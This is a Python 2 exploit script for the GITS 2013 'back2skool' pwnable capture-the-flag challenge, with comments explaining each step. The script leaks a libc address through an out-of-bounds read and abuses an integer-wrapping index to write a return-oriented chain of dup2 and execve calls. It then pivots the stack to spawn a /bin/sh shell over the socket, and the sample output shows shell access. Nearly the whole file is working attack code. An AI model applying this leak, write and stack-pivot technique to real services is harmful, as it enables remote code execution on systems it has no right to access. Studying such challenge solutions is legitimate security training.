Gits2013 Pwnable 250 back2skool sploit code *Important!! - Need to find the libc offset to make the exploit work!!
import socket,sys,time,re
"""
$python skool.py
libc_base : 0x840000
shell_base : 0x804c11c
Exploit...
uid=1003(back2skool) gid=1003(back2skool)
"""
def readPos(index):
    """Issue the service's ``read`` command for slot *index* and return the value as a hex string.

    Relies on the module-level socket ``sk`` already being connected and the
    service already being in the state that accepts ``read``.  The reply is
    scanned for runs of digits; element [1] is taken as the value (element [0]
    is presumably the echoed index -- not verifiable from this file).
    """
    sk.send("read\n");sk.recv(10240)
    sk.send("%d\n"%index)
    # NOTE: assumes the whole reply arrives in a single recv(); a short read
    # would make the regex miss the value and the [1] lookup raise IndexError.
    match = re.findall("(\d+)",sk.recv(10240))[1]
    return hex(int(match))
def writePos(index,value):
    """Issue the service's ``write`` command to store *value* in slot *index*.

    The index is sent offset by INT_MIN (-2147483648 + index).  How the service
    turns that back into *index* is not visible here -- presumably a signed
    comparison passes while the later arithmetic wraps; confirm against the
    challenge binary.  Each send is followed by a recv() that drains the prompt,
    again assuming one recv() returns the whole prompt.
    """
    sk.send("write\n");sk.recv(10240)
    sk.send("%d\n"%(-2147483648+index));sk.recv(10240)
    sk.send("%d\n"%value);sk.recv(10240)
# Python 2 script (print statements, str sent straight to the socket).
# Connect to the challenge service on the lab host and drain its banner.
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sk.connect(("mylab.local",31337))
time.sleep(1)
sk.recv(10248)
sk.send("func1\n");sk.recv(10240)
eip = 14                 # slot whose overwrite redirects control (see the writePos(eip, ...) call below)
base_addr = 0x0804c040   # address of slot 0 in the target binary, per the author; not derivable here
# find libc_base offset by sub with recv() offset
# readPos(-32) reads a slot below index 0 -- an out-of-bounds read that leaks a libc
# pointer.  0xd4630 is the author's offset of that pointer inside libc; it is specific
# to the libc build the author had (hence the gist title's warning).
libc_base = int(readPos(-32),16)-0x00d4630
# Gadget / function addresses relative to the leaked libc base.  All four offsets
# are build-specific and must be re-derived for any other libc.
xchg_sp_ax = libc_base+0x0005a5a0
dup2 = libc_base+0x00c40a0
execve = libc_base+0x009d6d0
pop2ret = libc_base+0x000772b7
shell = base_addr+(4*55)   # address of slot 55, where "/bin/sh" is stored below (4-byte slots)
print "libc_base :",hex(libc_base)
print "shell_base :",hex(shell)
# Prepare Data before Pwned!!
# Slots 0..12 are laid out as a return-oriented chain: dup2 with args (4, 0),
# dup2 with args (4, 1), each followed by pop2ret to discard the two args, then
# execve(shell, 0, 0) with 0x11223344 as its (never used) return address.
writePos(0,dup2)
writePos(1,pop2ret)
writePos(2,4)
writePos(3,0)
writePos(4,dup2)
writePos(5,pop2ret)
writePos(6,4)
writePos(7,1)
writePos(8,execve)
writePos(9,0x11223344)
writePos(10,shell)
writePos(11,0)
writePos(12,0)
# Slots 55/56 hold the little-endian bytes "/bin" and "/sh\0", i.e. the "/bin/sh" string.
writePos(55,0x6E69622f)
writePos(56,0x0068732f)
# Pwned Stage!!!
print "Exploit..."
# Overwriting slot `eip` with the xchg gadget makes the stack pointer point at
# slot 0, so the chain above executes once the "math" command returns.
writePos(eip,xchg_sp_ax) # pivot stack :)
sk.send("math\n")
sk.send("id\n");print sk.recv(10240)